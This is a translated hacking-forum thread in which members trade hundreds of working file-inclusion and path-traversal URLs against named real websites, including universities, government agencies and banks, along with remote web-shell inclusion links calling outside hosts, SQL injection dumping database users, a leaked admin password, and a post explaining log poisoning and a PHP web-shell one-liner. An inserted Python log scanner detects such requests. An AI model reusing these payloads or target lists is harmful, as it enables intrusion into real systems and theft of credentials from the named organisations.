View full version: PHP injections
blackybr
20.10.2007, 14:31
add
http://www.retabo.be/site/cont/index.php?cont=
a bunch of sites on this hoster....
+
http://www.trendula.de/index.php?cont=
ЛифчиС5СВ
21.10.2007, 19:04
open.goopy.ru
http://open.goopy.ru/index.php?s=[surrendered to the mercy of the enemy]
WIN
http://www.accessibleportugal.com/en/main.php?content=
arizona.edu
The University of Arizona.
http://math.arizona.edu/~msalomone/?p=../../../etc/hosts
http://math.arizona.edu/~msalomone/?p=../../../etc/passwd
http://math.arizona.edu/~msalomone/?p=../../../etc/syslog.conf
A bit of food :)
Food for lunch ;)
http://herot.engin.umich.edu/status/backup/bymachine/index.php?computer=[INCLUDE]
:)
Powermail
http://www.powermail.in/?cmd=Shell.txt?
Achtung :)
romeguide.it
http://www.romeguide.it/index2.php?pag=[url]
Серенький
29.10.2007, 22:29
stumbled upon a little site
pay attention and you'll get a shell ;-) and there
Free space : 1550.16 GB Total space: 1805.85 GB
http://austin.smallplanetguide.com/rentals/index.php?p=
Local include
I couldn't do anything there(
also a local one
http://www.barsandstuds.co.uk/index.php?page=../../../../../../../../etc/passwd
Please explain to me, what is the point of finding etc/passwd?
WindowS =)
http://israndom.com/default.php?content=
Ru
http://www.gumanitarij.ru/newsite/default.php?content=
P.S.: usually the point is that passwd contains the paths to users' folders. You can also try login/password combinations on FTP, the DB, etc. )
also a local one
http://www.barsandstuds.co.uk/index.php?page=../../../../../../../../etc/passwd
Please explain to me, what is the point of finding etc/passwd?
The point is that /etc/passwd exists on any *nix OS, and if you managed to include it (or, as a variant, read it), then there is at least a local include (I'm not considering the open_basedir case), and you don't need to guess the path to it, because with any (large) number of /../ you will read it anyway (since you can't jump above the root /), and after that it's whatever your imagination suggests...
for example, if there is a local include, you can:
1) read the passwd file and use it for brute-forcing with the login:login mask (and also learn the paths to users' home directories, which is sometimes very useful)
2) having found the path to the Apache logs by trying the standard paths, you can deliberately trigger an error, write, for example, PHP code into error_log, and then include that error_log (locally, mind you) and thereby execute that code (for example, an elementary web shell <?php system($_GET[cmd]); ?>)
3) if the site allows uploading images, you can insert PHP code into a gif or into the Exif data of a jpeg image, and then execute that code with the same local include (by including the image)
4) Say you have an SQL injection and the DB user has the filepriv privilege, but you can't write a shell because you don't know the paths, or there isn't a single web-accessible folder with write permissions; in the first case you can read the httpd.conf file (if you find it, and if you have read permissions) and learn the paths, although that can also be done through the SQL injection; in the second case you write your shell to /tmp and pick it up from /tmp with the local include
5) a bunch of options, as far as your imagination goes
If there is just a file reader, you can look at the site's configuration files and learn the DB user and password (they are usually stored unencrypted)
well, I hope you got it...
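The requests discussed in the post above, seen from the defender's side, as an added example that is not part of the original thread: a log scanner that flags include parameters which resolve outside the application directory, including the null-byte, double-encoded, base64 and URL-scheme variants that appear in this thread. `BASE_DIR`, the parameter names and the log lines are constructed assumptions.

```python
import base64
import posixpath
import re
from urllib.parse import parse_qsl, unquote

# Assumption for this example: the application only ever includes files
# that live under this directory.
BASE_DIR = "/var/www/site/pages"

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)
B64_RE = re.compile(r"^[A-Za-z0-9+/_-]{8,}={0,2}$")

# Constructed access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Oct/2007:14:31:02 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120',
    '198.51.100.23 - - [20/Oct/2007:14:32:10 +0000] "GET /index.php?page=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '198.51.100.23 - - [20/Oct/2007:14:32:11 +0000] "GET /index.php?page=..%252f..%252f..%252f..%252f..%252fetc%252fhosts HTTP/1.1" 200 211',
    '198.51.100.23 - - [20/Oct/2007:14:32:12 +0000] "GET /index.php?view=html&path=Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1" 200 1843',
    '198.51.100.23 - - [20/Oct/2007:14:32:13 +0000] "GET /index.php?page=http://files.example.test/x.txt%3F HTTP/1.1" 200 90',
    '198.51.100.23 - - [20/Oct/2007:14:32:14 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1843',
]


def decoded_forms(value):
    """Return the value plus every further decoding worth inspecting:
    repeated percent-decoding (double encoding) and base64."""
    forms = [value]
    for _ in range(2):
        nxt = unquote(forms[-1])
        if nxt == forms[-1]:
            break
        forms.append(nxt)
    for form in list(forms):
        compact = form.replace(" ", "+")  # parse_qsl turns '+' into ' '
        if not B64_RE.match(compact):
            continue
        compact = compact.replace("-", "+").replace("_", "/").rstrip("=")
        compact += "=" * (-len(compact) % 4)
        try:
            forms.append(base64.b64decode(compact, validate=True).decode("utf-8"))
        except ValueError:  # not base64, or not text once decoded
            continue
    return forms


def analyze(value):
    """Return (reasons, resolved_path) for a suspicious value, else None."""
    reasons = set()
    resolved = None
    for form in decoded_forms(value):
        if "\x00" in form:
            reasons.add("null_byte")
            form = form.split("\x00", 1)[0]  # what a C-string API would see
        if SCHEME_RE.match(form):
            reasons.add("url_scheme")
            continue
        # join() discards BASE_DIR for absolute input; normpath() collapses
        # '..' and cannot climb above '/', so surplus '../' segments still
        # land on the same file.
        path = posixpath.normpath(posixpath.join(BASE_DIR, form))
        if path != BASE_DIR and not path.startswith(BASE_DIR + "/"):
            reasons.add("escapes_base")
            resolved = path
    return (sorted(reasons), resolved) if reasons else None


def scan_log(lines):
    """Return (line_number, parameter, reasons, resolved_path) per finding."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        _, _, query = match.group(1).partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            verdict = analyze(value)
            if verdict:
                findings.append((number, name, verdict[0], verdict[1]))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same `normpath` containment check, applied to the requested name before it reaches `include`, is what rejects these values on the application side.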
~!DoK_tOR!~
05.11.2007, 01:18
Windows NT DS-31077-1 5.2 build 3790
http://nyec.modernsignal.net/content/documents/document2.php
Free space : 1665.75 GB Total space: 3209.17 GB
this shell.php immediately caught my eye... what a name))
http://www.gracestillwater.us/shell.php?content=
_-_
http://pages.minot.k12.nd.us/nodak/downtown/index.php?content=
_-_
http://www.redeuniversidade.com.br/rede/vitoria/link.php?pagina=[url]
http://www.vitoriaveiculos-rs.com/default.php?p=[url]
Maybe it's a repost, but this is an anti-repost: by the time you find it, all your traffic will be gone :(
http://www.ssslib.ch/new_site/main.php?acc=[url] :)
a bunch of web.psi.ch subdomains.....
http://bab.web.psi.ch/events/lela2003/index.php?incl=
php-ru.info
http://php-ru.info/index.php?dn=html&path=Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL 2V0Yy9wYXNzd2Q=
Heh heh, and they even write "Verified scripts and services"
UPD:
I just took a look and realized that this bug is present in the "html parser" mod (dn=html) for Danneo CMS, but I don't think I'll post it in the CMS vulnerabilities section; whoever wants to, go ahead and post it
Maybe it's a repost, I have no way to check. =)
Decided to scrounge up some edu =)
ru Win
http://www.ab-tuning.ru/index.php?href=
http://history.mashaholl.com/history.php?page=../../../../../../../../etc/passwd
0nep@t0p
10.11.2007, 13:57
http://ar.water.usgs.gov
http://banshee.ru
http://abi06.cms-hoster.de/?zeige=[url]
http://www.hh-statik.de/hofmann2/index.php?includemaincontent=[url]
http://www.phr.com/pageDisplay.php?pid=[url]
))
http://spiirit.yum.pl/sklep_new/site.php?file=
http://www.prinzenberger.de/include/index.php?ziel=
http://www.zaz-werdau.de/include/profil/profil.php?ziel=
http://www.photoconcept.ch/~scoutsmeyrin/index.php?menu=
win
http://www.immovent.ch/index2.php?main=
website of the popular rock band brainstorm
http://www.brainstorm.lv/main.php?lang=../../../../../../../../../etc/passwd%00
the null bug in person)))
Coldplay
http://coldplay.steelista.com/disk.php?id=../../../../../../etc/passwd%00
21.11.07
Windows
http://www.mastellermusic.com/default.php?body=[remote]
23.11.07
linux 2.2.7 MEST 1999 i586
haven't seen relics like this in a long time))
http://www.vegacom.cz/eng/main.php?body=[remote]
"All-Russian data bank of information and analytical materials on the main directions of the state youth policy of the Russian Federation"... what that means I can't figure out for the life of me... there are SQL injections there, and a PHP injection, and there is an admin panel... so as not to flood, I'm writing it all in PHP injections.
http://dmp.mgopu.ru/index.php?link_for_inc=[temote]
admin panel:
http://dmp.mgopu.ru/admin.php vbdmp/,qfyq
And in general the whole site is one solid bug (read: a colander).
provincia.chiet
http://www.provincia.chieti.it/iframe.php?file=../../../../../../etc/passwd%00
you can try www8))))
http://www.mi2005.de/bd4d/de/servlets/CORE/corecontrol.phtml?content=[remote].inc.php
European Union
http://bookshop.europa.eu/eGetRecords?Template=../../../../etc/passwd%00&indLan=EN;
-Hormold-
01.12.2007, 01:02
IBM:
http://publib.boulder.ibm.com/infocenter/wpdoc/v6r0/index.jsp?topic=[url]
FoxMALDER
02.12.2007, 03:40
Latvian design studio "CIMO" http://www.cimo.lv/img.php?img=../index.php%00
FreeBSD 5.5 | 2007
http://aeronic.com/sub.php?path=[remote]
Sony Business Solutions
http://b2b.sony.com/Solutions/page.do?page=/../../../../../../../../../../../../etc/passwd
And where did the anti-repost checker go from this thread?
There is a thread here, "Questions about vulnerabilities"; ask that question there.
http://www.arenasystem.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.sptc.ru
http://www.sptc.ru/perl/showfile.fcgi?fsmode=articles&filename=../../../../../../../../../../../../../../etc/passwd
there's a lot of interesting stuff on the server...
http://sartraccc.sgap.ru
haven't had a remote one in a while(
1. http://www.axisfilmsjakarta.com/main.php?sub=[remote]
2. http://www.exiledfear.com/?q=[remote]
The site is hosted on one of the opentransfer.com servers. Whoever can be bothered to dig, go to
/hsphere/local/config/httpd/sites/
_-[A.M.D]HiM@S-_
17.12.2007, 00:18
Safe_mode: ON
http://www.appdev.be/Main.php?main=[remote]
Safe_mode: ON
Turkey =)
http://www.savastepe.org/iframe.php?file=[remote]
send me a link where I can read about all this _ because I don't understand _
by PM please
www.parivartan.org.in
http://www.parivartan.org.in/index.php?filename=../../../../../etc/passwd
www.clinlab-kafedra.ru
http://www.clinlab-kafedra.ru/main.php?file=../../../../../../../../../../../../../../../../etc/passwd
.Begemot.
27.12.2007, 17:14
trapeza.com.ua
http://trapeza.com.ua/_dp/view2.php?file=../../../../etc/passwd
.Begemot.
29.12.2007, 00:39
geo21eye.com
http://www.geo21eye.com/sub2.php?filename=../../../../etc/passwd
Haven't taken part in this for quite a while =)
:)
Ded MustD!e
30.12.2007, 21:35
You're behind)) The last injection was last year!
AdReNa1!Ne
02.01.2008, 00:44
edu
http://www.studentmedia.ou.edu/index.php?page=../../../../etc/passwd
.Begemot.
02.01.2008, 22:48
permsovprof.ru
No idea, maybe it was already posted
www.az-jenata.com
Ded MustD!e
07.01.2008, 01:54
.edu
http://www.de-line.ru/?module=[url] (without the extension)
Sun Microsystems Laboratories Experimental
http://www.experimentalstuff.com/,id=6ieiid7rt5uuo12t2rmbnl?template.fileName=../../../../../../../../../../../../../../../etc/passwd
http://web.mmc.edu.cn/jiangong/news/note/show.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.sdau.edu.cn/gongyuan/invite/show_temp.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.savagewar.co.uk/index.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd%00
www.hut2.ru - The best free website hosting on the Net (*One of the IPs)
http://sungsm.hut2.ru/index.php?file=./../../../../../../../../../../../../../../../../../etc/passwd
http://sungsm.hut2.ru/index.php?file=./../../../../../../../../../../../../../../../../../etc/hosts
http://sungsm.hut2.ru/index.php?file=./../../../../../../../../../../../../../../../../../etc/services
K1nD[e]R
15.01.2008, 01:13
Hosting www.valuehost.ru
http://order.onehost.ru/order/index.php?hmid=-1004702225+union+select+1,2,3,4,5,6,7,concat_ws(0x 2F,user,password),9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26+from+mysql.user/*
Version:4.0.16-log
admin:
root 75dc61c73bae25f9
www.viza-vi.com.ua/admin/download.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd
www.adee.dental.tcd.ie - Association for Dental Education in Europe
http://adee.dental.tcd.ie/index.php?file=../../../../../../../../../../../../../../../../../../etc/passwd
www.structures.ucsd.edu - Structural Engineering
http://structures.ucsd.edu/index.php?page=structural_engineering/../../../../../../../../../../../../../../../../../../../../etc/passwd%00
www.studentmedia.ou.edu - Student Media
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.zsk-gazprom.ru/gallery/update/update5.php?lang=[url]
the shell has to be on a server that does not support php... for example www.nm.ru
and don't write .php at the end of the link...
So the request will be: http://www.zsk-gazprom.ru/gallery/update/update5.php?lang=http://www.site.nm.ru/r57shell
---------------------------------------------------------------
Grey: hmm, an astonishing include, or rather it's the perversity that astonishes: why upload a shell without an extension to who knows where?
Upload the shell anywhere with any extension, for example txt.
And then:
http://www.zsk-gazprom.ru/gallery/update/update5.php?lang=http://www.site.ru/shell.txt?
With a question mark at the end.
Something spicy...
http://www.wannawatch.com/hosted/index.php?wm_login=tcg4free&cf=y&sub=&site=mrbigdickshotchicks_mov205&page=../../../../../../../etc/passwd
http://www.minprom.bashkortostan.ru/_sfera.php?link=[url]
Ministry of Industry, Investment and Innovation Policy of the Republic of Bashkortostan
maybe a repost, no idea
http://www.ssga.ru/lidar/index.php?flag=14&file=../../../../../../../../../../../../../../../../../../../etc/passwd
I once googled up several vulnerable shops, no idea which ones are still valid; whoever isn't too lazy, check them:
Vulnerable script with the parameter:
/index.php?aux_page=../cfg/connect.inc.php
It outputs the mysql connection settings in the page source
The_HuliGun
19.01.2008, 11:25
A live example of a log include:
http://www.tcnj.edu/~acm/digitalfortress/?id=../../../../../../../../../../local/apps/packages/apache-2.0.59/logs/access_log%00
frigid20
23.01.2008, 21:56
http://www.physics.wustl.edu/Fac/facDisplayPopUp.php?name=../../../../../../etc/passwd
satana8920
29.01.2008, 12:22
and here's a collection from me!!!
Use them to your heart's content
satana8920
11.02.2008, 12:50
two rather interesting includes
http://www.longislandhshockey.net/cgi-bin/anyboard.cgi?fvp=/forum&cmd=retr&vf=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4 vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D
http://www.stylishfetish.com/cgi-bin/anyboard.cgi/board/forum/-=ab=-/index.html?cmd=retr&vf=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4 vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D :cool: :cool: :cool:
satana8920
16.02.2008, 06:27
oh, I'm so not ashamed, I found an include right at a fellow countryman's site :)
http://iou.otstudio.com/download.php?upload_filename=../../../../../../../../etc/passwd
TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
### TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
### http://switch.dl.sourceforge.net/sourceforge/truc/truc_0.11.0.tar.gz
### POC :
### /download.php?upload_filename=config_inc.php
### /download.php?upload_filename=../../../../../../../../etc/passwd
### Dork : TRUC 0.11.0 :: © 2006 by ASDIS :
### I'm TRYAGI ;) -- Tryag.cc/cc
:)
Cr@zy_King
17.02.2008, 16:18
Linux :
http://www.hotelbrno.cz/page.php?pageinc=http://by-enjoy.t35.com/atik/by.txt?
Linux :
http://www.rowanhilsden.com.au/remote.php
Linux :
http://www.waterless.com/product.php?product=http://by-enjoy.t35.com/atik/by.txt?
Linux :
http://www.all-free-fonts.com/?page=http://www.r57.li/r57.txt??
Win(nt) :
http://www.abruzzowebtv.it/index.php?content=http://drugs.kit.net/c99.txt?
Freebsd :
http://www.identification.net/customer/product.php?xcart_dir=http://source.ie/~collier/outdaed/shuntic?
Linux :
http://www.eloduna.hu/index.php?page=http://source.ie/~collier/outdaed/shuntic?
Good. :)
http://www.portcom.intercom.org.br/index.php?secao=http://
there's no include, but it's fun)))
include of an image with a shell at the end. A guitarists' site;)
http://gtpfiles.ru/?dir=../forum/uploads/av-1278.jpg%00
Heh..
ДРОЧИ.РУ - Porn site catalog
http://www.drochi.ru/index.cgi?category=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
procedure
23.02.2008, 10:55
http://www.vde.net/cgi/rc/samples/dirfull.cgi/etc/passwd
НЕДВИЖИМОСТЬ.com.ua
http://www.nedvigimost.com.ua/news.php?num=../../../../../../etc/passwd%00&cat=odnews
Decided to post it here
http://www.cosmotech.info/index.php?page=-5+union+select+1,'/etc/passwd',3,4,version()
http://www.drg.irp.com/cgi-bin/webplus.exe?Script=../../../etc/passwd
http://www.irpsys.com/cgi-bin/webplus.exe?script=/../../../../etc/passwd
~!DoK_tOR!~
02.03.2008, 19:21
http://www.oksybox.de/cgi-bin/auktion.pl?t=../../../../../../../../../../../../../etc/passwd%00
http://www.a-f-a24.de/cgi-bin/auktion.pl?t=../../../../../../../../../../../../../etc/passwd%00
http://www.dbzhevan.net/main.php?id=../../../etc/passwd
in the page source
and so on
So, here's what I dug up today
I checked on Google, there don't seem to be any of the same holes posted
Respect to Antichat
~!DoK_tOR!~
03.03.2008, 20:13
http://www.officesystems.ru/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.exyucaffe.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.liceoleonardogiarre.it/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.zavisni.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
Linux crow.unixbsd.info 2.6.9-55.0.12.ELsmp #1 SMP Fri Nov 2 11:19:08 EDT 2007 i686
http://istjuanpabloii.org/portal/iframe.php?file=[remote вжепь ебрило] =)
http://vnkatonak.com/autohtml.php?filename=../../../../../../etc/passwd
http://www.ke-f.org/autohtml.php?filename=../../../../../../etc/passwd
A little porn site
http://gallery.mastervcd.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00
Some kind of bank
http://globalbizbank.com/index.php?read=../../../../../../../../../../../../../etc/passwd
http://www.bitzone.co.uk/index.php?read=../../../../../../../../../../../../../etc/passwd
http://scenepay.com/index.php?read=../../../../../../../../../../../../../etc/passwd
http://www.payrupees.com/index.php?read=../../../../../../../../../../../../../etc/passwd
http://www.extreme-pay.com/index.php?read=../../../../../../../../../../../../../etc/passwd
we.mtu.edu
http://www.we.mtu.edu/faq.php?which=../../../../../../etc/passwd%00
IMHO we can do without the logs themselves
if every log gets posted, the thread will turn into a mess
especially since they don't carry any interesting info
well, that's just my opinion
//******************************************
Hi everyone
another sleepless night seems to have ended with a good result
Well, at least it doesn't look like a repost
And I'm running out of money for internet :-)))
Respect to Antichat
aaaaa
and one more:
http://www.cncnews.org/index.php?files=../../../boot.ini
PR-4
for fans of unconventional text-entry methods =))
http://blackheartmagazine.com/index2.php?p=[remote]
insfocus.com
http://www.insfocus.com/site.php?page=[inc]
Lamersha
07.03.2008, 20:24
http://lwdb.ru/index.php?part=[x3]
don't kick me, I couldn't open it up
blackybr
07.03.2008, 22:59
Lamersha, there's no include there
http://lwdb.ru/index.php?part=123%00
gibson, there's no include there (c) blackybr
http://shems.h1.ru/?../../../../../../../etc/passwd
blackybr
08.03.2008, 17:24
Yes. Comrades, read the manuals and the rules carefully. The thread is called PHP injection.
file_get_content, read functions, and partial includes like https://forum.antichat.ru/showpost.php?p=613811&postcount=635 do not count as such. From now on I will delete such posts and give minuses.
truelamer
08.03.2008, 20:35
http://www.shu.ru/index.php?link2=../../../../../../etc/passwd
A question along the way. So I found these passwords, but what next? Where do I put them? What do I do?
~!DoK_tOR!~
09.03.2008, 00:23
http://www.shu.ru/index.php?link2=../../../../../../etc/passwd
A question along the way. So I found these passwords, but what next? Where do I put them? What do I do?
those aren't passwords, there are no passwords there at all.
Read this for a start
https://forum.antichat.ru/threadnav12123-1-10-php+Injection.html
http://forum.web-hack.ru/index.php?showtopic=33063&go=1
http://www.inattack.ru/article/478.html (Zadoxlik ;) )
Here's a thing I found
install_help.cgi - this script lists the contents of directories
in the input field you type
../../../../../../../etc and you get what you wanted
If only it opened files too, it would be priceless
Don't scold me if I posted this in the wrong place
ReVOLVeR
15.03.2008, 23:30
for fans of unconventional text-entry methods
microsoft.com is registered through tucows)
tucows.com
http://tucows.com/software.html?t2=[FFF]
http://www.novistil.ru/index.php?option=com_zilchcatalog&task=view&id=EBLO
http://www.coolermaster.ru/index.php?LT=english&Language_s=2&url_place=product_class_include&files=../../../../../../../../etc/passwd
after watching an Al Pacino film I went to look at his site and found a shoutbox. But the shoutbox is allergic to brackets; this is all I've managed so far, who can get further :)
http://www.alpacino.in/shoutie/shouts.php?include=../../../../../etc/passwd
http://upload.nostra.by/search.php?action=zalupa
Muhacir, maybe this will warm your heart)
bobob, sorry, if you mean this SQLi ;)
http://www.alpacino.in/index.php?mact=Album,cntnt01,default,0&cntnt01albumid=4&cntnt01pictureid=52&cntnt01returnid=9999999999'+UNION+SELECT+1,2,3,4,5 ,6,7,8,9/*
http://rusxmms.sourceforge.net/index.php?page=tis
Klaus Doring
25.03.2008, 07:32
http://www.russian-inok.org/books/nachalnik/page.php?page=../../../../../../../../etc/passwd
:)
.Striker
04.04.2008, 23:51
http://www.hd.kiev.ua/admin/download.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.crcn.kiev.ua/admin/download.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.lucani.org/cirigliano/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://enricofontana.it/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
Found a couple of PHP ones. I'm a newbie and would like to know what the logs lying there give you. Thanks!
.Striker
05.04.2008, 20:16
http://carpeople.biz/admin/download.php?gubun=01&filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.onlinedog.co.kr/admin/download.php?gubun=01&filename=../../../../../../../../../../../../../../../../../etc/passwd
http://edufinder4u.com/admin/download.php?gubun=study&%20filename=../../../../../../../../../../../../../../../../../etc/passwd
These are all on one IP
Here's some gov-crap for you
http://www.nenc.gov.ua/isef/view/index.php?adress=../../../../../../../../../../etc/passw
.Striker
05.04.2008, 23:01
http://sodex.kiev.ua/eng/index.php?page=../../../../../../../../../../../../../../../../../etc/passwd
http://www.airfiltersupply.com/index.php?page=../../../../../../../../../../../../../../../../../etc/passwd
http://vethelp.ur.ru/index.php?../../../../../../../../../../../../../../../../../etc/passwd
http://www.jarrossay.net/contact.php?adress=[url]
P.S. I looked through the shell, there's a bunch of other sites on the server
http://asiane.byu.edu/arabic/index.php?content=../../../../../../../../../../etc/passwd%00
http://www.balkanpeace.org/index.php?index=../../../../../../../../../../../../etc/passwd%00
.Striker
07.04.2008, 17:28
http://www.parcoleonardo.it/php/file.php?file=../../../../../../../../../../../etc/passwd
http://slanyfree.net/howto.php?file=../../../../../../../../../../../etc/passwd
Mishatko
13.04.2008, 00:40
http://www.holsteinworld.com/ontheroad/index.php?file=/../../../../../../../../../../../../../../../etc/passwd
.Striker
13.04.2008, 14:22
http://bioweb.franko.lviv.ua/biophys/index.php?file=../../../../../../../../../../../etc/passwd
http://www.icc-media.org/telecharger1.php?file=../../../../../../../../../../../etc/passwd
DENTISTRY:
http://www.de-line.ru/?module=[shellllll] =>blacktooth ;)
.Striker
15.04.2008, 17:26
Ministry of Education and Science of Ukraine
http://www.mon.gov.ua/main.php?query=../../../../../../../../../../../etc/passwd
omg
Couldn't find the anti-repost checker, so sorry if this is a repeat
.Striker
16.04.2008, 22:24
http://www.automuna.com.ua/html/static.php?file=../../../../../../../../../../../etc/passwd
MaSter GeN
17.04.2008, 19:43
http://www.txregionalcouncil.org/display.php?page=../../../../../../../etc/passwd
http://www.hamantfoundation.org/centromedico/index.php?page=../../../../../etc/passwd
http://snsbizdev.com/index.php?page=../../../../../../../../../etc/passwd
.Striker
17.04.2008, 20:08
http://newgeneration.lv/rus/dla_pressi/interv_u_pastora/in_site/in_site/tools/transfer.php?file=../../../../../../../../../../../etc/passwd
http://download.unionsbraeu.de/transfer.php?file=../../../../../../../../../../../etc/passwd
.Striker
19.04.2008, 22:37
http://www.xtreemmusic.com/contact/public/static.php?file=../../../../../../../../../../../etc/passwd
http://minipc.org/safepup/index.php?file=../../../../.././../../../../../../../.././../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.excellentliving.org/index.php?file=../../../../.././../../../../../../../.././../../../../../../../../../../../../../../../../../../../../../etc/passwd
.Striker
21.04.2008, 21:04
http://www.terrano.or.id/static.php?file=../../../../../../../../../../../etc/passwd
http://storybush.net/static.php?file=../../../../../../../../../../../etc/passwd
Mishatko
23.04.2008, 02:41
http://download2.hobbyarea.ru/index.php?file=/../../../../../../../../../../../../../../../../../../etc/passwd
http://www.haus24.biz/index.php?file=/../../../../../../../../../../../../../../../../../../etc/passwd
www.new-techno.ru/index.php?file=/../../../../../../../../../../../../../../../../../../etc/passwd
http://milfordnh.info/town_general/report2007/index.php?file=/../../../../../../../../../../../../../etc/passwd
http://www.designetch.com.au/publications/club-link/index.php?file=/../../../../../../../../../../etc/passwd
.Striker
23.04.2008, 16:57
http://www.donorsforum.org.ua/media/files/get.php?file=../../../../../../../../../../../etc/passwd
http://www.ng.lv/rus/propovedi/propovedi_m/pastorskie_vstreci___2007/in_site/in_site/tools/transfer.php?file=../../../../../../../../../../../etc/passwd
http://www.alteclansing.com/index.php?file=../../../../../../../../../../../etc/passwd%00&iproduct_id=64
.Striker
28.04.2008, 15:52
http://www.mercierauto.com/static.php?file=../../../../../../../../../../../etc/passwd
http://www.metecol.com.ua/EN/static.php?file=/../../../../../../../../../../../etc/passwd
from nikoTM's post
http://forum.antichat.ru/showpost.php?p=670223&postcount=429
http://www.solanohelpwanted.com/index.php?page=../../../../../../../etc/passwd
.Striker
30.04.2008, 13:21
http://kdm.dgu.ru/static.php?file=../../../../../../../../../../../etc/passwd
http://www.jobtour.ru/PHP-Nuke/static.php?file=../../../../../../../../../../../etc/passwd
Local: http://www.reichenthal.at/pages/service-include.php?incl=../../../../../../../etc/passwd
Remote: http://schwein.ru/news/index.php?page=(shell address)
the dot is being filtered
MaZaHaKer
01.05.2008, 09:14
http://scenepay.com/index.php?read=../../../../../../../../../../../../../etc/passwd
~!DoK_tOR!~
01.05.2008, 20:45
http://www.cs.uofs.edu/~tjm2f/index.cgi?incl=/etc/passwd
http://www.aeroteam.ee/indexr.php?show=/etc/passwd
edu - PR7
http://pratt.edu/~cg525/index.php?file=../../../../etc/passwd&beensubmitted=true
.Striker
05.05.2008, 16:22
http://site.ksu.edu.ua/format.php?file=../../../../../../../../../../../etc/passwd
EDU PR5
a file reader... really a cool thing))
http://academic.marist.edu/skiteam/index.php?page=/usr/local/apache/conf/httpd.conf
.Striker
06.05.2008, 16:19
gov PR5
http://www.bpr.gov.my/cda/m_perundangan/akta_download.php?file=../../../../../../../../../../../etc/passwd
†c0(aIn?†
09.05.2008, 13:18
http://www.feckdeamon.co.uk/zomplog/.../../etc/passwd
http://www.feckdeamon.co.uk/zomplog/install/
http://www.fmij.com/blog/upload/forc...load.php?file=[local download]
.Striker
09.05.2008, 13:49
EDU - PR5
http://www.tceb.edu.tw/board/data/upload/download.php?file=../../../../../../../../../../../etc/passwd
~!DoK_tOR!~
09.05.2008, 22:17
http://sophie.byu.edu/literature/index.php?p=../../../../../../.../../../etc/passwd&textid=2079
.Striker
09.05.2008, 22:55
PR5
http://www.tcsac.gov.tw/file.php?file=../../../../../../../../../../../etc/passwd
~!DoK_tOR!~
10.05.2008, 01:52
http://www.w-mueller.com/adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd
.Striker
10.05.2008, 13:01
http://www.czerniejewo.pl/index.php?page=../../../../../../../../../../../etc/passwd
~!DoK_tOR!~
11.05.2008, 16:54
http://www.provincia.chieti.it/iframe.php?file=/etc/passwd
http://www.fas-line.net/html/iframe.php?file=/etc/passwd
http://www.fuomcokozel.com/iframe.php?file=/etc/passwd
http://www.oldcatholicorthodoxchurch.net/iframe.php?file=/etc/passwd
.Striker
11.05.2008, 17:08
http://www.ipunkt.biz/service/php-downloader/download.php?file=../../../../../../../../../../../etc/passwd
BlackSun
11.05.2008, 21:43
http://www.guameis.com/home.php?content=../../../../../../../../../../../../../../etc/passwd
http://www.nedvigimost.com.ua/news.php?num=../../../../../../etc/passwd%00&cat=odnews
http://www.piling.ru/site/page.php?num=../../../../../../../../../../../../../../../etc/passwd%00
.Striker
12.05.2008, 18:56
Sharjah Awqaf General Trust (SAGS)
http://www.awqafshj.com/php/arabic/downloadNewsletter.php?file=../../../../../../../../../../../etc/passwd
KPOT_f!nd
14.05.2008, 03:23
http://russian-cash.info/online/logo.jpg
PHP anti-repost checker: the whole database collected from pages 1 through 70. Huge thanks to Zircool (http://forum.antichat.ru/member.php?u=22600) for the help. From now on we work with the anti-repost checker; for breaking the rules a user will be punished with a (-) minus.
PHP anti-repost checker (http://russian-cash.info/online/php-include.php)
http://www.mg-protect.ru/index.php?lng=ua&page=../../../../../../../../../../../../../../etc/passwd
http://station2norfolk.com/home.php?page=../../../../../../../../../../../../../../etc/passwd%00
http://www.paulevans.name/page.php?page=../../../../../../../../../../../../../etc/passwd%00
.Striker
14.05.2008, 08:51
http://www.24steps.com/quellcode.php?file=../../../../../../../../../../../etc/passwd
http://www.centerforcommunityleadership.com/static/centerforcommunityleadership/newsletter.php?file=../../../../../../../../../../../etc/passwd
http://www.competeprosper.ca/download.php?file=../../../../../../../etc/httpd/conf/httpd.conf
